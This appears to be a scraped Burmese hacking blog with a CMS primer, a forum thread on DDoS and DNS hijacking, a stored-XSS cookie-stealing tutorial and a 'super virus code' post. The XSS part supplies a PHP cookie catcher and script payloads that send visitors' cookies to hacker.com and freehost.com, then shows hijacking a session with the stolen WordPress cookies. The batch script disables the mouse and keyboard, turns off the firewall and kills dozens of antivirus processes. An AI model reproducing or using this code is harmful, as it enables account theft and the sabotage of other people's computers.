ျမန္မာႏိုင္ငံမွာဆို ကြန္ပိန္းတာက တစ္မ်ိဳး နဲ႔ မစားသာ၀ူး ဒီေတာ့ သူ ႔ကို
အလြယ္လုပ္ဖို႔ Software ေတြေပၚလာတယ္ Content Management Software (CMS)
ဆိုတာေတြပါပဲ နာမည္နဲ႔လိုက္ေအာင္ သူတို႔က
စာတင္ စာျပင္ စာဖ်က္ အားလံုးကို လြယ္လြယ္ကူကူ Host
ေပၚမွာတင္ေဆာင္ရြက္သြားႏုိင္ပါတယ္
ဒီ CMS ေတြမွာလည္း အမ်ိဳးအစားႏွစ္မ်ိဳးရွိျပန္ေရာဗ်ာ ( ႏွစ္သံုးလံုးထိုးဗ် ဟီး )
1.Personal CMS
2.Social Network CMS ဆိုျပီး ( ေတာက္ တစ္နာရီ ထိုးရွိေသးတာကို ဘယ္က ၾကက္
က တြန္ေနလဲမသိ၀ူး တင္းတယ္ အဲ စာေတာင္ဘယ္ေရာက္သြားမွန္းမသိဘူး ၾကက္ကို
ေမတၱာပို႔ေနရတာ ) ႏွစ္မ်ိဳးရွိပါတယ္
Personal CMS ဆိုတာကေတာ့ တစ္ေယာက္တည္းေရးတဲ့ဆိုဒ္ေတြမွာအသံုးမ်ားပါတယ္
ဥပမာ www.ghostarea.net ဆုိ တစ္ေယာက္တည္းေရးတာေပါ့ဗ်ာ ဒါဆို Personal CMS
ေပါ့ေပါ့ပါးပါးေလးသံုးရံုပဲ နာမည္ၾကီးတဲ့ Personal CMS ေတြကေတာ့
1.Blogspot CMS
2.Wordpress CMS ျဖစ္ပါတယ္
Socail Network CMS နာမည္ကိုၾကည့္လုိက္တာနဲ႔သိမွာပါ ဒီ CMS က
ပိုရႈပ္သြားျပီ User ေတြလက္ခံမယ္ User ေတြကို Role ေတြထားမယ္ User
ေတြပိဳ႔စ္တင္ၾကမယ္ တဦးနဲ႔တဦးဆက္သြယ္ၾကမယ္ ဒီေတာ့ ဟို CMS ထက္
ပိုအထူးျပဳေသာ Special ျခင္ႏိုင္ေဆး
အဲ Special CMS လိုလာပါတယ္ ဒီ CMS ေတြဟာ Security ပိုင္းမွာ Personal CMS
ေတြထက္ပိုမုိအားနည္းပါတတ္ပါတယ္ နာမည္ၾကီးတဲ့ Socail Network CMS ေတြကေတာ့
1.Joomla
2.Durpal
3.Oxwall တို႔ျဖစ္ပါတယ္ အသီးသီး အားသာခ်က္ေတြရွိျပီး အသီးသီး
အားနည္းခ်က္ေတြရွိပါတယ္ Personal CMS ျဖစ္တဲ့ Wordpress CMS ကို Plugin
မ်ားထည့္ျပီး Socail Network အျဖစ္အသံုးျပဳႏုိင္ေပမယ့္ Socail Network
CMS ေတြေလာက္မေကာင္းတာေတြ ႔ရပါလိမ့္မယ္

CMS ေတြအေၾကာင္းလည္းသိျပီဆိုေတာ့ Blog စေရးႏုိင္ပါျပီ Blogspot CMS ကို
www.blogger.com မွာ Free Host ေပးျပီး SubDomain .blogspot.com
နဲ႔ေပးပါတယ္ Wordpress CMS ကိုေတာ့ www.wordpress.com မွာ ဖရီးေပးျပီး
.wordpress.com Subdomain နဲ႔ပါ
သို႔ေသာ္လည္း Free Host ဆုိရင္ plugin ေတြေပးမသံုးတာေတြ ႔ရပါတယ္
Joomla CMS ကိုေတာ့ Host ေပးေပမယ့္ Admin Panel ေပးထားတာေတြ မေတြ ႔ရလို႔
Free Host Link ေတြတင္မေပးေတာ့ပါဘူး Oxwall ကိုေတာ့ www.wall.fm မွာ
ေပးျပီး www.wall.fm Subdomain နဲ႔ပါ Durpal ကိုေတာ့ ဖရီးမေပးပါဘူး
တကယ္လို႔ Personal Blog တစ္ခုလုပ္ခ်င္တယ္ဆုိရင္ ကၽြန္ေတာ့္ကို ဆက္သြယ္ပါ
www.yoursite.co.cc နဲ႔ဆုိဒ္တစ္ခု အခမဲ့ လုပ္ေပးပါ့မယ္ CMS ကိုေတာ့
Wordpress သြင္းေပးပါ့မယ္ Blogger က အျပင္ကိုထြက္ခြင့္မေပးတာမို႔
သြင္းေပးလို႔မရပါ တကယ္လို႔ ကၽြန္ေတာ့္က်ဳတုိရီရယ္ေတြက
အဆင္ေျပပါတယ္ ဆက္ေရးပါ လို႔ ေတာင္းဆိုတဲ့သူရွိရင္ Wordpress CMS
သံုးစြဲပံုကို ထပ္ေရးေပးပါ့မယ္ ေက်းဇူးတင္ပါတယ္ :D :D



သိပ္ေကာင္းတဲ႔ ပုိစ္႔ တစ္ခုပါ ။ အခုလုိ အခ်ိန္ကုန္ခံျပီး ေသခ်ာရွင္းျပေပးတာကုိ ေက်းဇူးတင္ပါတယ္ ။ ညီေလး ပုိစ္႔နဲ႔ ပတ္သတ္ျပီး နဲနဲ ေဆြးေႏြးၾကည္႔မယ္ေနာ္ ၊
အျပဳသေဘာေဆာင္ျပီး ေဆြးေႏြးမွာျဖစ္တဲ႔ အတြက္ ခြင္႔ျပဳမယ္လုိ႔ ထင္ပါတယ္ ။

ညီေလး ေဆြးေႏြးထားတာနဲ႔ ပတ္သတ္ျပီး အေပၚမွာ quote လုပ္ထားတဲ႔ အပုိင္းေလးကုိ နဲနဲ ေဆြးေႏြးၾကည္႔မယ္ ။ ညီေလးေျပာသလုိ attacker ေတြအေနနဲ႔ တစ္ကယ္႔ နာမည္ၾကီး hosting server ေတြကုိ down သြားေအာင္ တုိက္ခုိ္က္ဖုိ႔ဆုိတာ မလြယ္ကူပါဘူး ၊ ဒါေပမယ္႔ သာမန္ host ေတြ ၊ အေပ်ာ္တမ္း နဲ႔ ကုိယ္
ပုိင္ hosting server ေတြအတြက္ေတာ႔ attacker ေတြအေနနဲ႔ down ေအာင္ တုိက္ဖုိ႔ဆုိတာ မခက္ခဲပါဘူး ၊ မခက္ခဲသလုိ အရမ္းလဲ မလြယ္ကူပါဘူး ။ tool
user ေတြအေနနဲ႔ေတာင္ တုိက္ခုိက္ႏူိင္ပါတယ္ ။ ကုိယ္ပုိင္ hosting server ေတြ မေျပာနဲ႔ 000webhost လုိေနရာမွာ hosting လုပ္ထားတဲ႔ ဆုိဒ္ကုိေတာင္
tool သုံးျပီး down ေအာင္တုိက္ခဲ႔ဖူးပါတယ္ ၊ ဒါေပမဲ႔ အဲဒါက ေတာ္ေတာ္ၾကာခဲ႔ပါျပီ ၊ လြန္ခဲ႔တဲ႔ ၅ ႏွစ္ေလာက္ကပါ ။ အခုအခ်ိန္မွာေတာ႔ အဲဒီအခ်ိန္တုန္းက
ေလာက္ မလြယ္ကူေတာ႔ပါဘူး ၊ ကြ်န္ေတာ္ကုိယ္တုိင္လုပ္ခဲ႔ဖူးျပီး ကုိ္ယ္တုိင္ ၾကဳံေတြ႔ခဲ႔ဖူးပါတယ္ ၊ အခ်ိန္ကာလအားျဖင္႔ တစ္ည တိတိ down ခဲ႔ပါတယ္ ။ ဒါက
DDoS attack နဲ႔ hosting server ေတြနဲ႔ ပတ္သတ္ျပီး attack လုပ္ဖုိ႔ လြယ္တယ္ ၊ မလြယ္ဘူးဆုိတာကုိ စာဖတ္သူေတြနဲ႔ ေလ႔လာသူေတြ သိျမင္ႏူိင္ေအာင္
ဥပမာ ေျပာျပတာပါ ။ ညီေလး ပုိစ္႔နဲ႔ ပတ္သတ္ျပီး အဓိက ေဆြးေႏြးလုိတာကေတာ႔
ဆုိတဲ႔ ေဆြးေႏြးခ်က္ပါ ။ ညီေလး နားလည္ထားတာ လြဲေနတာလဲ ျဖစ္ႏူိင္သလုိ႔ ၊ ညီေလး ဖတ္ဖူးတဲ႔ စာအုပ္ေတြက မွားေနတာလဲ ျဖစ္
ႏူိင္ပါတယ္ ၊ ဒါမွ မဟုတ္ ညီေလး ေျပာခ်င္တာကုိ မွားေရးမိတာလဲ ျဖစ္ႏူိင္ပါတယ္ ။ DDoS attack ရဲ႔ အဓိက လုပ္ေဆာင္ခ်က္က traffic overload ျဖစ္ေအာင္
server ဆီကုိ request မ်ားကုိ အဆမတန္ ပုိ႔လႊတ္ျခင္းျဖစ္ပါတယ္ ။ ဥပမာ - server က ဆုိဒ္တစ္ခုဆီက request ကုိ 1G max လက္ခံႏူိင္တယ္ဆုိပါဆုိ႔ ၊
ဒီအခ်ိန္မွာ attacker ေတြဟာ 3G ေလာက္ရွိတဲ႔ request ေတြကုိ တစ္ခ်ိန္တည္း တစ္ျပဳိင္တည္းမွာ အဆက္မျပတ္ပုိ႔လႊတ္လုိက္မယ္ဆုိရင္ server ဟာ ဘယ္လုိ
မွ request ေတြကုိ handle မလုပ္ႏူိင္ေတာ႔ပဲ ေနာက္ဆုံးမွာ down သြားရျခင္းျဖစ္ပါတယ္ ။ ျမင္သာေအာင္ ဥပမာ ေပးရရင္ သာမန္စီးဆင္းေန တဲ႔ ေခ်ာင္းငယ္ေလးတစ္ခုမွာ ပုံမွန္စီးဆင္းႏွဳန္းကုိ ခံႏူိင္ရည္ ရွိတဲ႔ တာပိတ္ထားတဲ႔ အခါမွာ ဘာမွ မျဖစ္ေပမဲ႔ မုိးအရမ္းၾကီးတဲ႔အခါ ဒါမွ မဟုတ္ အေၾကာင္းအမ်ဳိးမ်ဳိးေၾကာင္႔ ေရအရမ္းမ်ားလာျပီး ေရစီး သန္လာတဲ႔အခ်ိန္မွာ ပိတ္ထားတဲ႔ တာဟာ ခံႏူိင္ရည္မရွိေတာ႔ပဲ ေနာက္ဆုံးမွာ ပ်က္စီး
သြားရပါတယ္ ။ ဒါေၾကာင္႔ DDoS attack ေၾကာင္႔ server down သြားျပီး ေနာက္ဆုံးမွာ site down သြားရျခင္းျဖစ္ပါတယ္ ။ domain ဆုိတာ လူေနအိ္မ္တစ္
ခုရဲ႔ အိမ္လိပ္စာ လုိ႔ ဥပမာ ဆုိၾကပါစုိ႔ ။ လူတစ္ေယာက္ရဲ႔ အိမ္လိမ္စာကုိ သိယုံနဲ႔ အဲဒီအိမ္ကုိ ဖ်က္ဆီး လုိ႔မရပါဘူး ။ အိမ္လိပ္စာအတုိင္း ေရာက္ေအာင္သြားျပီမွ
အိမ္ရဲ႔ အမ်ဳိးအစား ခံႏူိင္ရည္ေပၚမူတည္ျပီး အင္အားကုိ လုိအပ္သေလာက္ အသုံးခ်မွ အဲဒီအိမ္ဟာ ပ်က္စီးမွာ ျဖစ္ပါတယ္ ။ အခု ကြ်န္ေတာ္ဥပမာေပးထားတာေတြ
ကုိဖတ္ျပီး DDoS attack ေၾကာင္႔ hosting server down သြားသလား ၊ domain down သြားသလားဆုိတာ ျမင္သာျပီလုိ႔ ထင္ပါတယ္ ။ ကြ်န္ေတာ္ေျပာ
တာေတြ မွားေနတယ္ဆုိရင္ ကုိယ္တုိင္ သာမန္ hosting server တစ္ခုကုိ DDoS နဲ႔တုိက္ခုိက္ၾကည္႔ပါ ၊ အဲဒီ server ေပၚမွာ host တင္ထားတဲ႔ က်န္တဲ႔ဆုိဒ္
ေတြပါ down သြားလိမ္႔မယ္ဆုိတာကုိ သတိျပဳမိပါလိမ္႔မယ္ ။ အနီးဆုံး ဥပမာ ေပးရရင္ လြန္ခဲ႔တဲ႔ ေလး ၊ ငါး ရက္ေလာက္က dynadot ဆုိဒ္ရဲ႔ DDoS attack
နဲ႔ ပတ္သတ္ျပီး ဖတ္ရွဳ ေလ႔လာ သုံးသပ္ၾကည္႔ႏူိင္ပါတယ္ ။

ေက်းဇူးတင္ပါတယ္ ...........


ဘာမွမတတ္ပဲေ၀ဖန္ၾကည့္မလို႕ အမွားပါရင္ေတာင္းပန္ပါတယ္..............။Negative Thunder ေျပာတဲ့အတိုင္းဆို Domain ကိုပဲ
Attack လုပ္တာပါ.......။ DDos နဲ႕ sever ကို attack လုပ္တာမဟုတ္ပါဘူး..........domain hijacking လုပ္ျပီး Domain ကို လမ္း
လြဲလိုက္ရင္ေကာ..........!!!!!!!!!!!!!!!!!!!!!!!. ......သိပ္ေတာ့မသိပါဘူး......ကၽြန္ေတာ္ေျပာၾကည့္တာပါ..........ထပ္ေျပာပါ့မယ္...
မွားသြားရင္ေတာင္ပန္ပါတယ္........




Negative Thunder ေရးထားတဲ႔ အထဲမွာ အစ္ကုိ ေျပာသလုိ Domain ကုိပဲ Attack လုပ္တယ္ ၊ DDoS နဲ႔ server ကုိ attack လုပ္တယ္လုိ႔ မဆုိလုိထားပါဘူး ။ ကြ်န္ေတာ္႔ reply ထဲမွာလဲ အထင္မွား မွာ စုိးလုိ႔ကုိ ဥပမာေတြနဲ႔ ေသခ်ာ ရွင္းျပထားပါတယ္ ။ ကြ်န္ေတာ္ ဘာကုိ ဆုိလုိတယ္ဆုိတာကုိ အစ္ကုိ ေသခ်ာ ျပန္ဖတ္ၾကည္႔ ေစခ်င္ပါတယ္ခင္ဗ်ာ ။

အစ္ကုိ ဆုိလုိတာက DNS hijacking ကုိ ဆုိလုိတာလား မသိဘူး ၊ ကြ်န္ေတာ္ သိပ္နားမလည္ဘူး ။ အစ္ကုိဆုိလုိတာကုိ ကြ်န္ေတာ္နားလည္မိသလုိ DNS hijacking လုပ္တယ္ဆုိရင္လည္း အခု ကြ်န္ေတာ္တုိ႔ ေဆြးေႏြးၾကသလုိ server down ျခင္း ၊ မ down ျခင္းနဲ႔ မသက္ဆိုင္ပါဘူး ။ DNS hijacking လုပ္ျခင္းအားျဖင္႔ ပုံမွန္အားျဖင္႔ ပုံစံ ႏွစ္မ်ဳိးရွိပါတယ္ ။ ပထမ တစ္ခ်က္ အေနနဲ႔ attacker ဟာ DNS hijacking ျပဳလုပ္ျပီး server ထဲမွာ ရွိတဲ႔ DNS records ေတြကုိ မိမိ လုိအပ္သလုိျပင္ဆင္ႏူိင္တဲ႔ gain access ရရွိသြားပါတယ္။ အဲဒီေနာက္မွာ attacker ဟာ fake page တစ္ခုကုိ လုိအပ္သလုိ ျပဳျပင္ ေျပာင္းလဲလုိက္ျပီး user ေတြကုိ မိမိရဲ႔ fake page ဆီကုိ redirect လုပ္လုိက္ပါတယ္ ။ ပုံမွန္အားျဖင္႔ user ေတြမွတဆင္႔ request ေတြ
ဟာ မူလ Domain ဆီကုိပဲ request လုပ္ၾကေပမဲ႔ တစ္ကယ္တမ္း user ေတြရဲ႔ request ေတြကေတာ႔ attacker ရဲ႔ spoof လုပ္ထားတဲ႔ website ဆီကုိပဲ
request ေတြဟာ ေရာက္ရိွသြားပါတယ္ ၊ ဒါက ပထမ တစ္ခ်က္ပါ ။ ဒုတိယ တစ္ခ်က္ကေတာ႔ attacker ဟာ website တြင္းမွာေတြ႔ရွိတဲ႔ contact email (သုိ႔မဟုတ္) administrative contact ေတြကုိ spoofing ျပဳလုပ္ျပီး ၊ ၎ inbox အတြင္းကုိ flooding ျပဳလုပ္တတ္ၾကပါတယ္ ။ ဒါေတြက DNS hijacking ျပဳလုပ္ျခင္းနဲ႔ ပတ္သတ္ျပီး attacker ေတြအေနနဲ႔ ျပဳလုပ္တတ္ၾကတဲ႔ နည္းလမ္းေတြပဲျဖစ္ပါတယ္ ။ အခု ကြ်န္ေတာ္ေဆြးေႏြးသြားတာက အစ္ကုိ ေဆြးေႏြးသြားတာနဲ႔ ပတ္သတ္ျပီး ကြ်န္ေတာ္ နားလည္မသလုိ ျပန္လည္ေရးသားျခင္းျဖစ္ပါတယ္ ၊ ကြ်န္ေတာ္ သည္လည္း ေလ႔လာ သင္ယူေနဆဲ တစ္ေယာက္ပါပဲ ။ အစ္ကုိ ဆုိလုိတာကုိ ကြ်န္ေတာ္ နားလည္မွဳ လြဲျပီး ေဆြးေႏြးခဲ႔မိတယ္ဆုိရင္ လည္း ေတာင္းပန္ပါတယ္ ။ အခုလုိအျပဳသေဘာေဆာင္ တဲ႔ ေဆြးေႏြးမွဳမ်ဳိးကုိ ၾကဳိဆုိပါတယ္ဗ်ာ ။ ကြ်န္ေတာ္ မွားယြင္းေနတာ ရွိရင္လဲ ေဝဖန္ေထာက္ျပႏူိင္ပါတယ္ ။

ME;;;;;;;;;;;

အကိုျပန္ေဆြးေႏြးသြားတာလဲ ျပည့္ဆံုပါတယ္..တကယ္ေတာ့နားလည္မႈနည္းနည္းေလး လဲြသြားတယ္ထင္တယ္...... Glad ခုလိုျပည့္ဆံုေအာင္းျပန္လည္
ေဆြးေႏြးေပးတာကိုပဲ...ကၽြန္ေတာ္ေက်းဇူးတင္ရမွာပါ........။ကြ်န္ေတာ္ မွားယြင္းေနတာ ရွိရင္လဲ ေဝဖန္ေထာက္ျပႏူိင္ပါတယ္ ။ ဆိုတဲ့စာ
ေၾကာင္းေလးကို ျပန္လည္ေဆြးေႏြးရရင္ တကယ့္ကိုျပည့္ဆံုတဲ့ ေဆြးေနြးမႈပါပဲ..........လို႕ :P :P :P :P :P :P :P :P







:P

ကၽြန္ေတာ္တို႕ေဆြးေႏြးသေလာက္ကေတာ့ဒါေလးပါပဲ ........ကၽြန္ေတာ္လဲဘယ္လိုေခါင္းစဥ္တပ္ရမလဲလို႕
စဥ္းစားရင္းမူရင္းအတိုင္းေလးပဲ တပ္ေပးလိုက္တယ္...........။မူရင္းကေတာ့ http://mmhackforums.noonhost.com/web-developing-necessary-for-begineers-vt115.html ျဖစ္ပါတယ္။
Read More ->>

What is Cross-Site-Scripting & Cookie Stealing with Persista

What is XSS?

XSS ဆိုတာ Cross Site Scripting လို႕ေခၚတဲ့ Web Application Vulnerability အမ်ိဳးအစားတစ္ခုပါပဲ.။ Input Filter လုပ္မထားေသာ ေနရာမွတစ္ဆင့္ Code Inject လုပ္၍ Website User မ်ား၏ ID မ်ား Cookies မ်ားကိုခိုးယူႏိုင္သကဲ့သို႕ အျခားနည္းမ်ားျဖင့္ တုိက္ခိုက္ျခင္းကိုဆိုလုိသည္.။

ဘယ္လို Input လုပ္မထားတာလဲဆိုေတာ့ ဒီလိုပါ

Code

<?php
$name=$_GET['name'];
print $name;
?>test.php ပဲဆိုပါစို႕ဗ်ာ ၾကည့္လိုက္ပါ User Input ကုိ Filter လုပ္ထားျခင္းမရွိပါ သို႕ေၾကာင့္ ေအာက္ပါကဲ့သို႕ JavaScript မ်ား Inject လုပ္ႏုိင္သည္

http://127.0.0.1/test.php?name=<script>alert(“XSS”)</script>

ဒီလိုဆို XSS ဆိုျပီး Alert တက္လာပါလိမ့္မယ္…

Two Types of Attacking

1.Persistant XSS
2.Non-Persistant XSS

1.Persistant XSS
stored or second-order vulnerability လို႕လည္းေခၚၾကပါတယ္။ HTML Entities မ်ားကို Encode လုပ္စရာမလိုပဲ User Data မ်ားကို တုိက္ခိုက္ႏုိ္င္ေသာ နည္းတစ္နည္းျဖစ္သည္.။

Let’s Start

Code:

<?php
$name=$_GET['name'];
print $name;
?>

ခုနကလည္းေျပာခဲ့ဖူးတာပါပဲ. User Input ကို Filter လုပ္ထားျခင္းမရွိေသာေၾကာင့္ Javascript မ်ား Inject လုပ္ႏုိင္ပါသည္.။

ပထမဆံုး Vuln ျဖစ္မျဖစ္ရွာရေအာင္..။

ဥပမာ ဖိုရမ္တစ္ခုဆိုပါစို႕ www.vulnforum.com ေပါ့ အဲ့မွာ ဖို၇မ္ခြဲတစ္ခုရွိတယ္ Problem Report ဆိုပါစို႕ အဲ့ဒီ့ဖိုရမ္ခြဲမွာ ကၽြန္ေတာ္ ပထမဆံုး ေပါက္မေပါက္စစစ္ပါမယ္

Subject : XSS Persistant Test
Message : <alert>”XSS”</alert>

ျပီးရင္ Submitted . အဲ့ဒီ့မွာ ကၽြန္ေတာ္တို႕ ျပန္ထြက္လိုက္ပါတယ္ ျပန္၀င္လိုက္ရင္ Pop Up Box နဲ႕ “XSS” လို႕တက္ေနရင္ Inject လုပ္လို႕ရပါျပီ

ဒါဆိုရင္ အျခားေသာ User မ်ားရဲ႕ Cookies မ်ား Steal လုပ္ႏုိင္ရန္ ျပင္ဆင္ရပါမယ္.

Cookie Catcher:

<?php
$cookie = $_GET['c'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);;
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen(‘cookies.html’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’
IP: ‘ .$ip. ‘
Date and Time: ‘ .$date. ‘
Website: ‘.$referer.’
‘);
fclose($fp);
header (\”javascript:history.back()\”);
?>
<html></html>

သိပ္ရႈပ္ရႈပ္ရွက္ရွက္ၾကီးမဟုတ္လုိ႕ ကၽြန္ေတာ္ရွင္းမျပေတာ့ပါဘူး ေနာက္မွပဲ Cookies Catcher ေတြနဲ႕ ပက္သက္ျပီး သီးသန္႕ေရးေပးပါ့မယ္.။ Host တစ္ခုမွာ cookies.php ဆိုတာနဲ႕ တင္ပါ့မယ္
ဥပမာ www.freehost.com/cookies.php ေပါ့ Cookies Catcher အတြက္ ျပင္ဆင္လုိ႕ျပီးပါျပီ.။

Let’s Inject

ခုနကေျပာခဲ့တဲ့  Sub Forum ရဲ႕ Subject မွာ လူစိတ္၀င္စားမယ့္ ေခါင္းစဥ္မ်ိဳးတင္ပါ့မယ္ ( ဒါမွ ၀င္ၾကည့္ၾကမွာကိုး  ၀င္မွလည္း Cookies ခိုးလို႕ရမွာကိုး )

Subject : Hey.I found a vuln in this forum
Message : <script>document.location=”http://hacker.com/cookies.php?c=”+document.cookies</script>  ဆိုျပီး ကၽြန္ေတာ္တုိ႕ Java Script ကို Inject လုပ္ပါ့မယ္ ဒါဆို ကၽြန္ေတာ္တုိ႕ Comment ေပးထားတဲ့ေနရာကို အျခား User ၀င္တဲ့အခါမွာ User ရဲ႕ Cookies ဟာ ကၽြန္ေတာ္တို႕ www.freehost.com/cookies.html မွာ သြားျပီး သိမ္းသြားပါတယ္

Cookie:wordpressuser_9314f063e7420cf3cB09db0405006c51=user;
wordpresspass_9314f063e7420cf3cB09db0405006c51=f4370adBcd051f0ecd169424abe8ea;session=s
IP:192.186.0.0
Date and Time:Data & Time
Referer:

ဒီလိုေပါ့ဗ်ာ ဒါဆို ကၽြန္ေတာ္တုိ႕ဟာ

www.vulnforum.com ရဲ႕ Address Bar မွာ

javascript:void(document.cookie=”wordpresspass_9314f063e7420cf3cB09db0405006c51=f4370adBcd051f0ecd169424abe8ea=user”)

လို႕ Inject လုပ္ျပီး Reload လုပ္တဲ့အခါ User ရဲ႕ Control Panel ကိုေရာက္သြားပါျပီ

ေနာက္တစ္မ်ိဳး အဲ့ေနရာမွာပဲ ေနာက္တစ္ထုေပါ့ဗ်ာ

Subject :Hey..I think this forum has vuln
Message : <iframe frameborder=0 height=0 width=0 src=javascript:void(document.location=”www.freehost.com/cookies.php?c=” + document.cookie)</iframe>

Code ကို Inject လုပ္ပါ့မယ္.။ ျပီးရင္ Submit ဆိုပါစို႕.။

အဲ့ဒါကို တျခား User က ျမင္ျပီး Link ကို ၀င္ၾကည့္မိပါလိမ့္မယ္ ဒါေပမယ့္ ေခါင္းစဥ္ကလြဲျပီး ဘာမွမျမင္တာနဲ႕ Comment ေပးလိုက္ပါတယ္ ဒါဆို ခုနကအတုိင္းပဲ Cookies Steal အလုပ္ခံရဦးမွာပဲျဖစ္ျပီး User Control Panel ကိုထိန္းခ်ဳပ္ခံရဦးမွာပဲျဖစ္ပါတယ္ အကယ္၍ User မဟုတ္ဘဲ Admin သာ ျဖစ္ခဲ့ရင္… ;-)

_________________
!....Learn to Be Matured....!


post by  
Read More ->>

Template ေျပာင္းလဲမည္။


ကၽြန္ေတာ့္ဆိုက္ေလးကို လာေရာက္ဖတ္ရႈတဲ့ သူေတြကိုေက်းဇူးတင္ပါတယ္......။ကၽြန္ေတာ္ဆိုက္ေလးရဲ႕
လက္ရိွသံုးေနတဲ့ template အစားေနာက္ထပ္အသစ္ကိုအသံုးျပဳခ်င္ပါတယ္.......။ဒါေၾကာင့္လာမည့္ လရဲ႕ အစ
ျဖစ္တဲ့ ၁ ရက္ေန႕ ၂ ရက္ေန႕မွာ ေျပာင္းလဲသြားမွာပါ.....။အဲဒီလိုေျပာင္းလဲေနတုန္းကို ဆိုက္ခဏပိတ္ထား
ပါ့မယ္........။ကၽြန္ေတာ္ျမန္ႏိုင္သေလာက္ ျမန္ျမန္ျပီးေအာင္ေဆာင္ရြက္သြားမွာပါ..။ ကၽြန္ေတာ္ၾကိဳတင္အသိ
ေပးအပ္ပါတယ္။
Read More ->>

Wednesday, February 22, 2012

super virus code








do not try on your own pc!

you can save " .bat " file

@echo off
//disable mouse
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
cls
//disable mouse x2
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
cls
//disable keyboard
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start "nokeyboard.reg"
cls
start www.shwekoyantaw.blogspot.com
//antivirus disable
net stop “Security Center” >nul
netsh firewall set opmode mode=disable >nul
tskill /A av* >nul
tskill /A fire* >nul
tskill /A anti* >nul
tskill /A spy* >nul
tskill /A bullguard >nul
tskill /A PersFw >nul
tskill /A KAV* >nul
tskill /A ZONEALARM >nul
tskill /A SAFEWEB >nul
tskill /A OUTPOST >nul
tskill /A nv* >nul
tskill /A nav* >nul
tskill /A F-* >nul
tskill /A ESAFE >nul
tskill /A cle >nul
tskill /A BLACKICE >nul
tskill /A def* >nul
tskill /A kav >nul
tskill /A kav* >nul
tskill /A avg* >nul
tskill /A ash* >nul
tskill /A aswupdsv >nul
tskill /A ewid* >nul
tskill /A guard* >nul
tskill /A guar* >nul
tskill /A gcasDt* >nul
tskill /A msmp* >nul
tskill /A mcafe* >nul
tskill /A mghtml >nul
tskill /A msiexec >nul
tskill /A outpost >nul
tskill /A isafe >nul
tskill /A zap* >nul
tskill /A zauinst >nul
tskill /A upd* >nul
tskill /A zlclien* >nul
tskill /A minilog >nul
tskill /A cc* >nul
tskill /A norton* >nul
tskill /A norton au* >nul
tskill /A ccc* >nul
tskill /A npfmn* >nul
tskill /A loge* >nul
tskill /A nisum* >nul
tskill /A issvc >nul
tskill /A tmp* >nul
tskill /A tmn* >nul
tskill /A pcc* >nul
tskill /A cpd* >nul
tskill /A pop* >nul
tskill /A pav* >nul
tskill /A padmin >nul
tskill /A panda* >nul
tskill /A avsch* >nul
tskill /A sche* >nul
tskill /A syman* >nul
tskill /A virus* >nul
tskill /A realm* >nul
tskill /A sweep* >nul
tskill /A scan* >nul
tskill /A ad-* >nul
tskill /A safe* >nul
tskill /A avas* >nul
tskill /A norm* >nul
tskill /A offg* >nul
cls
echo Please be patience, this will take a moment.
echo loading
ping localhost -n 2 >nul
cls
//hide desktop
--------------------------------------------------
